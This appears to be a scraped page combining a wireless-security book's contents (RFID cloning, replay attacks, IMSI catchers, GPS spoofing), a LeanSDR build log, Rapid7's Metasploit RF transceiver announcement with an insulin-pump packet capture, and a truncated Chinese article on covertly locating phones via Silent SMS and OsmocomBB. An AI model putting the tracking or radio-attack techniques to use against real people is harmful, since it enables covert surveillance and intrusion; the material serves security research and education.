Introduction of 《Inside Radio: An Attack and Defense Guide》


Inside Radio:An Attack and Defense Guide

This book discusses the security issues in a wide range of wireless devices and systems, such as RFID, Bluetooth, ZigBee, GSM, LTE, and GPS. It collects the findings of recent research by the UnicornTeam at 360 Technology, and reviews the state-of-the-art literature on wireless security. The book also offers detailed case studies and theoretical treatments – specifically it lists numerous laboratory procedures, results, plots, commands and screenshots from real-world experiments. It is a valuable reference guide for practitioners and researchers who want to learn more about the advanced research findings and use the off-the-shelf tools to explore the wireless world.

About the Authors


Qing YANG is the founder of UnicornTeam & the head of the Radio Security Research Department at 360 Technology. He has vast experience in information security area. He has presented at Black Hat, DEFCON, CanSecWest, HITB, Ruxcon, POC, XCon, China ISC etc.


Lin HUANG is a senior wireless security researcher and SDR technology expert at 360 Technology. Her interests include security issues in wireless communication, especially cellular network security. She was a speaker at Black Hat, DEFCON, and HITB security conferences. She is 360 Technology’s 3GPP SA3 delegate.



This book is a joint effort by the entire UnicornTeam, including Qiren GU, Jun LI, Haoqi SHAN, Yingtao ZENG, and Wanqiao ZHANG etc.


Qiren GU is a senior security researcher at Radio Security Department of 360 Technology, a member of UnicornTeam. He focuses on wireless communication security,cellular network security, SDR Related Technologies, and also other problems in ADS-B, GPS, Bluetooth, Wifi, NFC, RFID. He is the trainer for ISC, also the lecturer of 360 Network Security University, defcon group 010 speaker. guy behind


Jun LI is a senior security researcher at Radio Security Department of 360 Technology, core member of UnicornTeam, he got a master degree from Chengdu University of Information Technology . His is focusing on the security research of connected cars,wireless communication,hardware etc. He had presented his researches at premier security conferences like Blackhat, DEFCON,ISC,CanSecWest, HITB, Syscan360 etc. He is the trainer for ISC . He is the author of Smart Car Attack&Defence Demystified. He won sixth place i n MITRE IoT Challenge .He was featured in the documentary A Century With Cars by CCTV. He started the first DEFCON GROUP in China—DC010 and his is the member of DEFCON GROUPs Global Advisory Board .


Haoqi Shan is a senior security researcher at Radio Security Department of 360 Technology. He is also a PhD student in information security at University of Florida. He focuses on Wi-Fi penetration, 2G/4G system, embedded device hacking etc. He made serial presentations about RFID hacking and LTE devices hacking on BlackHat, Defcon, Cansecwest, CodeBlue, Syscan360 and HITB, etc.


Yingtao ZENG is a Security researcher at UnicornTeam in the Radio Security Research Department of 360 Technology. He is mainly focused on the security of Internet of things, car remote control systems and automotive radar safety research. He has found vulnerabilities in a variety of automobile manufacturers including Buick, Volvo, Chevrolet, Toyota, Nissan, BYD and more. He was a speaker at the Hack In The Box(HITB),DEFCON CarHacking Village,Black Hat


Wanqiao ZHANG is a senior security researcher at Radio Security Department of 360 Technology, a member of UnicornTeam, she got a master degree from Nanjing University of Aeronautics and Astronautics. She is focusing on the security research of Communication, Radio of Civil Aviation, Satellite Communication etc. She had presented her researches at premier security conferences like DEFCON, POC, RUXCON, MOSEC etc.She is the trainer for IChunqiu . A delegate of Qihoo 360 in 3GPP.


hardcover 978-981-10-8446-1

eBook 978-981-10-8447-8

Publisher: Springer Singapore

Publisher: Springer; 1st ed. 2018 edition (May 9, 2018)Or April 9,2018

We will sell the book in HITB SECCONF 2018 Amsterdam .



Index to Outline of 《Inside Radio: An Attack and Defense Guide》

 Chapter 1 Overview of Wireless Security, Attack and Defense

1.1 Overview of wireless security
1.1.1 Origin of wireless security
1.1.2 Difference between wireless security and mobile security
1.1.3 Status quo of wireless security
1.2 Wireless attack and defense methods
1.2.1 Common attack targets
1.2.2 Wireless attack methods
1.2.3 Wireless defense methods
1.2.4 Trend of wireless security

Chapter 2 Tools for Wireless Security Research

2.1 Software-defined radio technology
2.1.1 SDR capabilities
2.1.2 SDR usage
2.2 SDR hardware tools
2.2.1 USRP
2.2.2 RTL-SDR
2.2.3 HackRF
2.2.4 bladeRF
2.2.5 LimeSDR
2.3 SDR software tool — GNU Radio
2.3.1 GNU Radio installation
2.3.2 The first thing to do after installation
2.3.3 Example: OFDM Tunnel
2.4 Sniff mouse and keyboard data
2.4.1 Use SDR to sniff data packets of wireless keyboards and mouses running on nordic chips
2.4.2 MouseJack

Chapter 3 RFID/NFC Security

3.1 Introduction to Mifare Classic
3.2 Security analysis of Mifare Classic
3.2.2 Review of the process of cracking Mifare Classic
3.3 A real case of cracking Mifare Classic
3.3.1 Introduction to Proxmark Ⅲ
3.3.2 Burn and use Proxmark III firmware
3.3.3 Proxmark III client
3.3.4 Test the security of Mifare Classic with Proxmark III
3.3.5  Introduction to Chameleon-Mini
3.3.6 Burn and use Chameleon-Mini firmware
3.3.7 Simulate Mifare Classic by combining Proxmark III and Chameleon-Mini
3.3.8 Conclusion of HF attack and defense
3.4 Security analysis of LFID cards
3.4.1 Introduction to LFID cards
3.4.2 Coding principle of ID cards
3.4.3 Decoding principle of ID cards
3.4.4 Read data from ID cards
3.4.5 Format of the ID card number
3.5 Clone an LFID card
3.5.1 Simulation attacks with Proxmark III
3.5.2 Clone attacks with a blank card
3.5.3 Simulation attacks with HackID
3.6 EMV privacy leakage
3.6.1 EMV introduction
3.6.2 Mechanism of privacy leakage in contactless chip cards
3.6.3 Phenomenon of privacy leakage in contactless chip cards
3.6.4 Contactless chip card fraud
3.6.5 Privacy protection in the use of contactless chip cards

Chapter 4 433/315MHz Communication

4.1 Sniff and analyze the security of remote control signals
4.2 Attacks by replaying remote control signals
4.2.1 Parking bar signal replay
4.2.2 Wireless door bell signal replay
4.2.3 Vibrator signal replay
4.3 Crack fixed-code garage doors with brute force
4.3.1 Complexity of brute-force attack
4.3.2 Hardware for fixed-code brute-force attack
4.4 Security analysis of remote car key signals
4.4.1 Generation of remote control signals
4.4.2 Security analysis of Keeloq key generation algorithm
4.4.3 An example of remote controller bugs
4.4.4 Rolljam replay attacks on car keys
4.4 Security analysis of the PKE system
4.5 Security analysis of the tire pressure monitoring system

Chapter 5 Aeronautical Radio Navigation

5.1 Introduction to ADS-B system
5.1.1 Definition of ADS-B
5.1.2 Definition of 1090ES
5.2 ADS-B signal encoding
5.2.1 Modulation method
5.2.2 Format of message
5.2.3 Altitude code
5.2.4 CPR longitude and latitude code
5.2.5 CRC validation
5.3 ADS-B signal sniffing
5.3.1 Receive ADS-B signal with “dump1090”
5.3.2 Receive ADS-B signal with “gr-air-modes”
5.4 ADS-B signal deception
5.5 Analysis of attack and defense

Chapter 6 Bluetooth Security

6.1 Introduction to Bluetooth technology
6.3 Bluetooth sniffing tool Ubertooth
6.3.1 Ubertooth software installation
6.3.2 Ubertooth usage
6.4 Low-power Bluetooth
6.4.1 TI’s BLE Sniffer
6.4.2 Sniff BTLE data packets with “ubertooth-btle”
6.4.3 Read and write BLE devices’ properties with a mobile app
6.4.4 Transmit data packets by simulating the BLE device

Chapter 7 ZigBee Technology

7.1 Introduction to ZigBee
7.1.1 The relationship between ZigBee and IEEE 802.15.4
7.1.2 Structure of 802.15.4 frames
7.1.3 Different types of MAC frame in ZigBee
7.1.4 Device types and network topology of ZigBee
7.1.5 ZigBee networking
7.1.6 Application layer of ZigBee
7.1.7 The application support sub-layer of ZigBee
7.1.8 Application profile of ZigBee
7.2 ZigBee security
7.2.1 Security layers
7.2.2 Key types
7.2.3 Security levels
7.2.4 Key distribution
7.2.5 Access authentication for ZigBee nodes
7.3 ZigBee attacks
7.3.1 Attacking tools
7.3.2 Protocol analysis software
7.3.3 Network discovery
7.3.4 Attack an unencrypted network
7.3.5 Attack an encrypted network
7.4 An example of attacking
7.4.1 Obtain the key from the device
7.4.2 Attacks by using the key
7.5 Summary of attacks and defenses

Chapter 8 Mobile Network Security

8.1 Security status of the GSM system
8.1.1 Terminology and basic concepts of the GSM/UMTS system
8.1.2 Security of GSM encryption algorithms
8.1.3 Active attack and passive attack in GSM
8.1.4 GSM sniffing with “gr-gsm”
8.2 IMSI Catcher
8.2.1 What is an IMSI Catcher?
8.2.2 IMSI Catcher in GSM environment
8.2.3 IMSI Catcher in UMTS environment
8.2.4 IMSI Catcher in LTE environment
8.2.5 Defect of the IMSI Catcher
8.2.6 Stingray cellphone tracker
8.2.7 IMSI Catcher Detector
8.3 Femtocell security
8.3.1 Introduction to femtocell
8.3.2 Attack surface of femtocell
8.3.4 GSM femtocell based on VxWorks
8.4 LTE redirection and downgrade attack
8.4.1 Redirection attack principles IMSI catcher DoS Attack Redirection Attack
8.4.2 The cause of redirection bugs
8.5 ‘Ghost Telephonist’ Attack
8.5.1 Vulnerability principle
8.5.2 Experiment setting
8.5.3 Attack methods
8.5.4 Countermeasures
8.6 Analysis of attack and defense

Chapter 9 Satellite Communication

9.1 Overview of artificial satellites
9.2 GPS security research
9.2.1 GPS sniffing and security analysis
9.2.2 GPS spoofing
9.2.3 Methods of defense and suggestions
9.3 Security analysis of Globalstar system
9.3.1 Globalstar’s CDMA technology
9.3.2 Globalstar data cracking
9.3.3 Possible attack methods


Mac OSX 编译 LeanSDR

LeanSDR:Lightweight, portable software-defined radio

git clone
cd leansdr/src/apps


g++ -O3 -I.. -Wall -Wno-sign-compare -Wno-array-bounds -Wno-unused-variable -DGUI -lX11 -o leandvb  ||  \
    g++ -O3 -I.. -Wall -Wno-sign-compare -Wno-array-bounds -Wno-unused-variable       -o leandvb
In file included from
../leansdr/gui.h:16:10: fatal error: 'X11/X.h' file not found
#include <X11/X.h>
1 error generated.
g++ -O3 -I.. -Wall -Wno-sign-compare -Wno-array-bounds -Wno-unused-variable -DGUI -lX11 -o leansdrscan  ||  \
    g++ -O3 -I.. -Wall -Wno-sign-compare -Wno-array-bounds -Wno-unused-variable       -o leansdrscan warning: comparison of unsigned expression < 0 is always false [-Wtautological-compare]
        if ( nr < 0 ) fatal("read");
             ~~ ^ ~
1 warning generated.
ld: library not found for -lX11
clang: error: linker command failed with exit code 1 (use -v to see invocation) warning: comparison of unsigned expression < 0 is always false [-Wtautological-compare]
        if ( nr < 0 ) fatal("read");
             ~~ ^ ~
1 warning generated.
g++ -O3 -I.. -Wall -Wno-sign-compare -Wno-array-bounds -Wno-unused-variable -DGUI -lX11 -o leansdrcat  ||  \
    g++ -O3 -I.. -Wall -Wno-sign-compare -Wno-array-bounds -Wno-unused-variable       -o leansdrcat
ld: library not found for -lX11
clang: error: linker command failed with exit code 1 (use -v to see invocation)
g++ -O3 -I.. -Wall -Wno-sign-compare -Wno-array-bounds -Wno-unused-variable -DGUI -lX11 -o leantsgen  ||  \
    g++ -O3 -I.. -Wall -Wno-sign-compare -Wno-array-bounds -Wno-unused-variable       -o leantsgen
ld: library not found for -lX11
clang: error: linker command failed with exit code 1 (use -v to see invocation)
g++ -O3 -I.. -Wall -Wno-sign-compare -Wno-array-bounds -Wno-unused-variable -DGUI -lX11 -o leanchansim  ||  \
    g++ -O3 -I.. -Wall -Wno-sign-compare -Wno-array-bounds -Wno-unused-variable       -o leanchansim
ld: library not found for -lX11
clang: error: linker command failed with exit code 1 (use -v to see invocation)
g++ -O3 -I.. -Wall -Wno-sign-compare -Wno-array-bounds -Wno-unused-variable -DGUI -lX11 -o leandvbtx  ||  \
    g++ -O3 -I.. -Wall -Wno-sign-compare -Wno-array-bounds -Wno-unused-variable       -o leandvbtx
ld: library not found for -lX11
clang: error: linker command failed with exit code 1 (use -v to see invocation)


sudo find / -name "X.h"
find: /dev/fd/cn0xroot: No such file or directory
find: /dev/fd/cn0xroot: No such file or directory


APPS = leandvb leansdrscan
APPS += leansdrcat leantsgen leanchansim leandvbtx

all: $(APPS)

rm -f $(APPS)

DEPS = ../leansdr/*.h

CXXFLAGS = -O3 -I.. -I/opt/X11/include -Wall -Wno-sign-compare -Wno-array-bounds -Wno-unused-variable

%: $(DEPS)
g++ $(CXXFLAGS) -DGUI $< -lX11 -L/opt/X11/lib -o $@ || \
g++ $(CXXFLAGS) $< -o $@

EMBED_FLAGS= -I.. -Wall -Wno-sign-compare -Wno-array-bounds -Wno-unused-variable \
-Ofast -mfpu=neon -funsafe-math-optimizations -fsingle-precision-constant

leandvb.embedded: $(DEPS)
g++ $(CXXFLAGS) $(EMBED_FLAGS) $< -static -o $@ || \
g++ $(CXXFLAGS) $(EMBED_FLAGS) $< -o $@


leandvb --help
Usage: leandvb [options]  < IQ  > TS
Demodulate DVB-S I/Q on stdin, output MPEG packets on stdout

Input options:
  --u8           Input format is 8-bit unsigned (rtl_sdr, default)
  --f32          Input format is 32-bit float (gqrx)
  -f HZ          Input sample rate (default: 2.4e6)
  --loop         Repeat (stdin must be a file)
  --inbuf N      Additional input buffering (samples)

Preprocessing options:
  --anf N        Number of birdies to remove (default: 1)
  --derotate HZ  For use with --fd-pp, otherwise use --tune
  --resample     Resample baseband (CPU-intensive)
  --resample-rej K  Aliasing rejection (default: 10)
  --decim N      Decimate baseband (causes aliasing)
  --cnr          Measure CNR (requires samplerate>3*symbolrate)
  --fd-pp NUM    Dump preprocessed IQ data to file descriptor

DVB-S options:
  --sr HZ        Symbol rate (default: 2e6)
  --tune HZ      Bias frequency for demodulation
  --drift        Track frequency drift beyond safe limits
  --standard S   DVB-S (default), DVB-S2 (not implemented)
  --const C      QPSK (default), BPSK .. 32APSK (DVB-S2 only)
  --cr N/D       Code rate 1/2 (default) .. 7/8 .. 9/10
  --fastlock     Synchronize more aggressively (CPU-intensive)
  --sampler      nearest, linear, rrc
  --rrc-steps N  RRC interpolation factor
  --rrc-rej K    RRC filter rejection (defaut:10)
  --roll-off A   RRC roll-off (default: 0.35)
  --viterbi      Use Viterbi (CPU-intensive)
  --hard-metric  Use Hamming distances with Viterbi

Compatibility options:
  --hdlc         Expect HDLC frames instead of MPEG packets
  --packetized   Output 16-bit length prefix (default: as stream)

General options:
  --buf-factor   Buffer size factor (default:4)
  --hq           Maximize sensitivity
                 (Enables all CPU-intensive features)
  --hs           Maximize throughput (QPSK CR1/2 only)
                 (Disables all preprocessing)

UI options:
  -h             Display this help message and exit
  -v             Output debugging info at startup and exit
  -d             Output debugging info during operation
  --fd-info NUM  Output demodulator status to file descriptor
  --fd-const NUM Output constellation and symbols to file descr
  --gui          Show constellation and spectrum (X11)
  --duration S   Width of timeline plot (default: 60)
  --linger       Keep GUI running after EOF

Testing options:
  --awgn STDDEV  Add white gaussian noise (slow)
eanchansim --help
Usage: leanchansim [options]  <  > IQ.out
Simulate an imperfect communication channel.

Input options:
  --iu8              Interpret stdin as complex unsigned char
  --if32             Interpret stdin as complex float
  -f Hz              Specify sample rate
  --loop             Repeat (stdin must be a file)

Gain options:
  --scale FACTOR     Multiply by constant

Drift options:
  --lo HZ            Specify nominal LO frequency
  --ppm PPM          Specify LO accuracy
  --drift-period S   Drift +-ppm every S seconds
  --drift-rate R     Drift with maximum rate R (Hz/s)
  --drift2-amp HZ    Add secondary drift (range in Hz)
  --drift2-freq HZ   Add secondary drift (rate in Hz)

Noise options:
  --awgn STDDEV      Add white gaussian noise (dB)

Output options:
  --ou8              Output as complex unsigned char
  --of32             Output as complex float
leandvbtx --help
Usage: leandvbtx [options]  < TS  > IQ
Modulate MPEG packets into a DVB-S baseband signal
Output float complex samples

Options:  -f INTERP[/DECIM]        Samples per symbols (default: 2)
  --roll-off R             RRC roll-off (defalt: 0.35)
  --power P                Output power (dB)
  --agc                    Better regulation of output power
  -v                       Verbose output
leansdrcat --help
Usage: leansdrcat [options]
Forward from stdin to stdout at constant rate.

  --block      Pause when stdout is busy (default: '#' on stderr)
  --nonblock   Silently ignore when stdout is busy
  --cbr R      Set rate in bits per second
  --cbr8 R     Set rate in bytes per second
  --cbr16 R    Set rate in 16-bit words per second
  --cbr32 R    Set rate in 32-bit words per second
  --cbr64 R    Set rate in 64-bit words per second
  -h           Display this help message and exit
leansdrscan --help
Usage: leansdrscan [options]  [program settings]
Run , cycling through combinations of settings.
Example: 'leansdrscan -v cat -n,-e' will feed stdin through 'cat -n' and 'cat -e' alternatively.

  -h              Print this message
  -v              Verbose
  --timeout N     Next settings if no output within N seconds
  --rewind        Rewind input (stdin must be a file)
  --probesize N   Forward only N bytes (with --rewind)
leantsgen --help
Usage: leantsgen [-c PACKETCOUNT]
Output numbered MPEG TS packets on stdout.


rtl_sdr -g 0 -f 315e6 -s 1000000 /tmp/test.ts
leandvb --gui -v -d -f 1000e3 --sr 500e3 --cr 1/2 --derotate -4500 --anf 0 < /tmp/test.ts > mpeg.ts


Metasploit的射频收发器功能 | Metasploit’s RF Transceiver Capabilities


我们花费大量时间来监控我们的企业网络,并使用许多工具来检测异常的行为。我们不断地扫描漏洞、公布测试。然而,我们经常不能认识到自己网络,和家庭中的小型(有时是大型)物联网(IoT)设备。令人震惊的是,考虑到它们的普遍性 – 这些设备并不是容易被测试的。





  • 这些连接的设备能做什么?
  • 这些设备的作用范围是多少?
  • 设备是否具有无线功能?






以安全研究的名义进行的大部分活动可能是有争议的或难以理解的。 但RF测试肯定是正确的,随着我们看到越来越多的技术利用RF通信,研究领域变得越来越多和越普遍。


这是Metasploit背后的逻辑,以及驱动了Rapid7大规模的漏洞研究工作。这也是RF 收发器出现的原因。我们坚信,RF测试是漏洞测试非常重要的的一部分(虽然目前仍被忽视),随着物联网生态系统的发展,射频测试的重要性将会持续增加。

我们有这样一个案例,2016年,Rapid7的Jay Radcliffe公布了强生公司Animas OneTouch Ping胰岛素泵的多个漏洞。攻击演示过程


虽然Jay认为攻击者利用这些漏洞的可能性比较低,但可能会严重伤害使用该技术的患者。幸运的是,Jay及时发现了这个问题,并给强生公司提出建议,通知病患者使其减轻风险。 如若没有RF测试,这些漏洞可能一直存在,患者将无法做出选择来保护自己。

REMOTE: 00 00 00 04 A3 5A 92 B2 4C 00 0E 0F .....Z..L...
REMOTE: 00 00 00 04 A3 5A 92 B2 4C 00 0E 0F .....Z..L...
PUMP: 00 00 FF 00 1A D1 81 81 ........
REMOTE: 20 00 0E 00 BF DB CC 6F ......o
PUMP: 03 00 F1 04 16 B9 B9 87 2C 01 00 00 ........,...
REMOTE: 03 00 F8 00 31 FD C9 EE ....1...
PUMP: 03 00 07 04 88 76 DA DD 2C 01 00 00 .....v..,...
REMOTE: 03 00 12 00 F0 30 0E FC .....0..
PUMP: 20 00 ED 12 E7 BC 93 43 01 01 27 05 26 02 8F 00 ......C..'.&...
PUMP: 57 45 45 4B 44 41 59 00 00 00 WEEKDAY...
PUMP: 05 00 EA 00 D5 8F 84 B3



在解释其工作原理之前,需做一个简单申明: Rapid7不销售RF测试所需的硬件。您可以在任何地方获得。比如:Hacker Warehouse,Hak5,淘宝,京东,亚马逊或任何无线设备的电子商店。


第一个RF收发器版本支持TI cc11xx低功耗Sub-1GHz射频收发器。 RF收发器可以调整设备来识别和调制解码信号。甚至可以创建短时间的干扰来识别故障状态。该版本还提供了与TI cc11xx芯片组流行的RfCat python框架兼容的完整API。如果您现有的程序使用RfCat,您可以轻易的将它们移植到Metasploit中。此版本附带两个后置模块:基于暴力破解的振幅调制(rfpwnon) 和 通用发射器(transmitter)。

如何使用RF Transceiver

使用新的RF 收发器需要购买像Rard Stick One这样兼容RfCat的设备。 然后下载最新的RfCat驱动程序,在这些驱动程序中,会有一个rfcat_msfrelay。这是RfCat中Metasploit Framework的中继服务器,运行在附属的RfCat兼容设备系统上。


$./msfconsole -q
msf > use auxiliary/client/hwbridge/connect
msf auxiliary(connect) > run

[*] Attempting to connect to
[*] Hardware bridge interface session 1 opened ( -> at 2017-02-16 20:04:57 -0600
[+] HWBridge session established
[*] HW Specialty: {"rftransceiver"=>true} Capabilities: {"cc11xx"=>true}
[!] NOTICE: You are about to leave the matrix. All actions performed on this hardware bridge
[!] could have real world consequences. Use this module in a controlled testing
[!] environment and with equipment you are authorized to perform testing on.
[*] Auxiliary module execution completed
msf auxiliary(connect) > sessions

Active sessions

Id Type Information Connection
-- ---- ----------- ----------
1 hwbridge cmd/hardware rftransceiver -> (

msf auxiliary(connect) > sessions -i 1
[*] Starting interaction with 1...

hwbridge > status
[*] Operational: Yes
[*] FW Version: 450
[*] HW Version: 0348

要了解有关RF Transceiver的更多信息,在这里下载最新的Metasploit:

The rise of the Internet of Things

We spend a lot of time monitoring our corporate networks. We have many tools to detect strange behaviors. We scan for vulnerabilities. We measure our exposure constantly. However, we often fail to recognize the small (and sometimes big) Internet of Things (IoT) devices that are all around our network, employees, and employees’ homes. Somewhat alarmingly – considering their pervasiveness — these devices aren’t always the easiest to test.

Though often difficult, it is technically possible to find and identify some of these IoT devices via their Ethernet side connection. But that doesn’t always give us a full picture of the risk these devices present to consumers or organizations. When assessing only Ethernet connected devices you can miss the wireless world that can have a major impact on the security of your organization. Wireless systems often control alarm systems, surveillance monitoring, door access, server room HVAC controls, and many other areas.

Which leaves us with one very critical question: how do you really determine the risk of these devices?

Let’s start with the basics:

  • What do these connected devices do?
  • What is the range of exposure of these devices?
  • Does the device have wireless capabilities?

Traditionally, we often perform perimeter scans of our 802.11 wireless networks to ensure our Access Points are secure and the network bleed isn’t too large. We can monitor these Access Points (APs) to create overlap in case one goes down or gets interference from a nearby kitchen microwave.

However, if you’re asking yourself, “but what about the rest of the wireless spectrum?” that’s exactly the position we found ourselves in.

Radio, radio, everywhere

Chances are your company and employees are already using many other radio frequencies (RFs) outside of the standard 802.11 network for various reasons. Perhaps you have a garage door with a wireless opener? Company vehicle key fobs? Not to mention RFID card readers, wireless security systems, Zigbee controlled lights, or HVAC systems.

What are the ranges for these devices? Are they encrypted or protected? What happens when they receive interference? Do they fail in a closed or open state?

The inability to effectively answer these questions (easily or even at all) is the very reason we are releasing the RFTransceiver extension for Metasploit’s Hardware Bridge, and why we think this will be a critical tool for security researchers and penetration testers in understanding the actual attack surface.

Now, security teams will be able to perform a much broader assessment of a company’s true security posture. They will be able to test physical security controls and better understand when foreign IoT and other devices are brought onto the premises.

Sunlight is the best disinfectant

Much of the activity undertaken in the name of security research can be contentious, divisive, or hard to understand. This is certainly true of RF testing, an area of research becoming both more prevalent and increasingly necessary as we see more and more technologies leveraging RF communications.

The most common criticism of any technology created for the purpose of security testing is that bad guys could use it to do bad things. The most common response from the security research community is that the bad guys are already doing bad things, and that it’s only when we understand what they’re doing, can effectively replicate it, and demonstrate the potential impact of attacks, that we can take the necessary steps to stop them. Sunlight is the best disinfectant.

This is the logic behind Metasploit, as well as what drives Rapid7’s extensive vulnerability research efforts. It is also the reasoning behind the RFTransceiver. We strongly believe that RF testing is an incredibly important – though currently often overlooked – component of vulnerability testing. We believe that failing to test the usage of radio frequency in products puts people and organizations at risk. We also believe the importance of RF testing will continue to escalate as the IoT ecosystem further expands.

To provide an example of this kind of testing, in 2016, Rapid7’s Jay Radcliffe disclosed vulnerabilities in Johnson & Johnson’s Animas OneTouch Ping insulin pump. The popular pump has a blood glucose meter that serves as a remote control via radio frequency in a proprietary wireless management protocol. Communications between the pump and the remote control are sent in cleartext, rather than being encrypted. This creates an opportunity for an attacker with the right technical skills and resources, opportunity, and motive to spoof the Meter Remote and trigger unauthorized insulin injections.

While Jay considered the likelihood of an attacker exploiting these vulnerabilities in the wild to be quite low, it could seriously harm a patient using the technology. Fortunately, Jay’s research uncovered the problem and he was able to work with Johnson & Johnson to notify patients and advise them of ways to mitigate the risk. Without RF testing, these vulnerabilities would have continued to go unnoticed, and patients would not have the opportunity to make informed choices to protect themselves.

How it works

Just one quick author’s note before we get into the ‘how-to’ portion. Rapid7 does not sell the hardware required to perform RF testing. The required hardware can be found at any number of places, including Hacker Warehouse, Hak5, or any electronics store that carries software defined radios or RF transmitter hobbyist equipment.

With the RFTransceiver, security pros have the ability to craft and monitor different RF packets to properly identify and access a company’s wireless systems beyond Ethernet accessible technologies.

The first RFTransceiver release supports the TI cc11xx Low-Power Sub-1GHz RF Transceiver. The RFTransceiver extension makes it possible to tune your device to identify and demodulate signals. You can even create short bursts of interference to identify failure states. This release provides a full API that is compatible with the popular RfCat python framework for the TI cc11xx chipsets. If you have existing programs that use RfCat you should be able to port those into Metasploit without much difficulty. This release comes with two post modules: an Amplitude Modulation based brute forcer (rfpwnon) and a generic transmitter (transmitter).

How to use RFTransceiver

Using the new RFTransceiver extension requires the purchase of an RfCat-compatible device like the Yard Stick One. Then download the latest RfCat drivers, included with those drivers you will find rfcat_msfrelay. This is the Metasploit Framework relay server for RfCat. Run this on the system with the RfCat compatible device attached.

Then you can connect with the hardware bridge:

./msfconsole -q

msf > use auxiliary/client/hwbridge/connect

msf auxiliary(connect) > run

[*] Attempting to connect to

[*] Hardware bridge interface session 1 opened ( -> at 2017-02-16 20:04:57 -0600

[+] HWBridge session established

[*] HW Specialty: {"rftransceiver"=>true}  Capabilities: {"cc11xx"=>true}

[!] NOTICE:  You are about to leave the matrix.  All actions performed on this hardware bridge

[!]          could have real world consequences.  Use this module in a controlled testing

[!]          environment and with equipment you are authorized to perform testing on.

[*] Auxiliary module execution completed

msf auxiliary(connect) > sessions

Active sessions


Id  Type                   Information    Connection

--  ----                   -----------    ----------

1   hwbridge cmd/hardware  rftransceiver -> (

msf auxiliary(connect) > sessions -i 1

[*] Starting interaction with 1...

hwbridge > status

[*] Operational: Yes


[*] FW Version: 450

[*] HW Version: 0348

To learn more about the RFTransceiver, you can download the latest Metasploit here:

GSM Hacking:静默短信(Silent SMS)在技术侦查中的应用


GSM Hacking:The application of Silent SMS in technical investigation

GSM 基站

0x00 前言


如何做到呢?首选当然是高大上的7号信令系统(SS7)。你需要一个能够访问的支持MAP(Mobile Application Part)的SS7信令接入点,然后,你理论上就可以侦听,拦截,伪造全球任何移动用户的电话和短信了,也可以获得该手机当前接入的Cell ID从而精确定位。因为全球的电信运营商都连在一张信令网上,除非某些运营商做了信令过滤,否则不管你从哪个国家接入SS7,命令在全球运营商那里都会得到忠实执行。目前国际上常见的SS7信令接入点的租用价格是每月几千美元起,对机构来说并不是很贵。



信令系统#7(SS7:Signaling System #7)由 ITU-T 定义的一组电信协议,主要用于为电话公司提供局间信令。SS7 中采用的是公共信道信令技术(CCS:common-channel signaling),也就是带外(out-of-band)信令技术,即信令服务提供独立的分组交换网络。

MAP:Mobile Application Part (移动应用部分)七号信令的子集。用于连接分布式交换单元(MSC)和主数据库(HLR)。HLR能动态存储移动网络用户的当前位置和预置文件。在处理拨入呼叫的过程中需要使用HLR。当网络用户位置改变时,HLR也要相应更新,用户便由网络中的其他交换机服务。


Clipboard Image.png


打开世界五大王牌情报组织之一朝阳群众的野战工具箱,我们会看到很多民间自制的情报工具,本文介绍其中的Slient SMS的低成本实现方法和简单应用。

其实,Silent SMS在各国执法部门都大量使用,即使他们同时也在使用SS7,比如柏林警方去年的发送数量就超过了10万。和SS7只能定位到基站不同,Silent SMS配合伪基站+三角定位法,开阔空间定位精度可以达到1米左右,实战中可以直接定位到广场上的某个人。这样即使目标人物使用了易容术,随身携带的手机也会不知不觉的告诉我们真相。

0x01 背景知识

手机号码(MSISDN)在移动通信网上是很少进行传输的。对于移动网络来说,区别不同手机的惟一ID是IMSI(International Mobile Subscriber Identity)。MSISDN是为了方便人类而做的一个IMSI在现实世界的映射。你打电话发短信时提交的是对方的MSISDN,移动网络收到你的请求后要把MSISDN映射回IMSI,然后才能处理。你接电话收短信时对方的MSISDN也是单独发送给你的,好让你能知道知道对方是谁。

而为了保护安全和隐私,IMSI在设计上也是尽量少的在网络上传输的,通常情况下只在首次Attach和越区切换位置更新时才需要向移动网络提交你的IMSI。当移动网络确认你的合法身份后会指派一个临时身份给你,在GSM网络里是TMSI(Temporary Mobile Subscriber Identity),在LTE里是S-TMSI(为了简化我们也把它称作TMSI),之后在需要身份识别的时候,都是用TMSI的。


IMSI(International Mobile Subscriber Identity,国际移动用户识别码)用于在全球范围唯一标识一个移动用户。一个IMSI唯一标识一个移动用户,在全世界都是有效的。

无线网络覆盖的范围很大,如果IMSI在网络中传递时被不法分子获取,这个是非常危险的。所以需要采用另外一种号码临时代替IMSI在网络中进行传递,这就是TMSI(Temporary Mobile Subscriber Identity,临时移动用户标识)。采用TMSI来临时代替IMSI的目的为了加强系统的保密性,防止非法个人或团体通过监听无线路径上的信令窃取IMSI或跟踪用户的位置。





0x02 原理

当有新的Mobile Terminated Services,通常是短信或来电,要传送的时候,移动网络会发起Paging。目标手机守听时发现网络在呼叫自己的TMSI,就会向网络申请一个信道,申请成功后,手机转到该信道发送呼叫响应,网络回复该呼叫响应,然后经过鉴权、加密协商等流程后,网络开始向手机传送服务,这时手机才知道来的是电话还是短信,在收到一部分服务信息后,手机开始决定是否提示用户和如何提示用户,是来电话了还是收到短信了,是振铃还是震动等。


Silent SMS是一种特殊格式的短信,在短信报文头上设置特殊的标识位以后,接收者手机收到后不会有任何提示和反应,也不会存储短信内容,而是直接丢弃。不使用特殊技术手段无法发现手机收到了Silent SMS。向目标手机发送Silent SMS,我们会侦听到网络广播的Paging信息,但是不需要像电话呼叫那样顾虑时延和及时挂断的问题,目标手机上不会有任何提示。而且我们还可以在空中侦听到短信的完整内容,当侦听到我们自己构造的特定内容的短信可以帮我们进一步确认该TMSI就是我们的目标。

TMSI是在一个LAC(Location Area Code)/TA(Tracking Area)里有效的,每当进入一个新的LAC/TA,手机就会被网络指派一个新的TMSI。要找出的对应关系,必须侦听目标手机当前所在的LAC/TA。对我们有利的是,Paging也是在LAC/TA里有效的,除了LTE的Smart Paging。

0x03 低成本实现

朝阳群众的情报工具应该尽可能的便宜,所以我们使用开源软件+廉价设备的方式。我们优选的方案是OsmocomBB + Motorola C118/C139。

网上能找到国外黑客写的用Python调用USB短信猫发送Silent SMS,用Airprobe + RTL-SDR接收的源代码,但是硬件成本比我们的贵,最关键是代码比较散。

OsmocomBB:基于一套泄露的基带源代码重写的开源的GSM基带项目,只能支持TI Calypso基带处理器。被用来参考的那套泄露源代码不完整,只有90+%的源代码,部分连接库没有源代码,而且也缺少DSP的代码。OsmocomBB被设计成黑客的实验工具,而不是供普通用户使用的手机系统,为了方便编写和修改,其Layer 2和3是在PC上运行的。

